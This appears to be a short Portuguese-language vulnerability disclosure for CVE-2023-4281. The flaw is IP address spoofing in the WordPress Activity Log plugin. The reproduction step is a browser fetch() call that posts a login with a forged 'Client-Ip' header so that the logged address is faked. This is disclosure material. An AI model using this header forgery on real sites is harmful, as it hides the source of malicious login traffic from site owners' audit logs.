
Repositório para a vulnerabilidade CVE-2023-4281.
ID do CVE: CVE-2023-4281
Tipo de Vulnerabilidade: Falsificação de Endereço IP
Descrição: O plugin Activity Log recupera endereços IP de clientes a partir de cabeçalhos potencialmente não confiáveis, permitindo que um atacante manipule seu valor. Isso pode ser usado para ocultar a origem de tráfego malicioso.
Passos para reproduzir:
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Referências: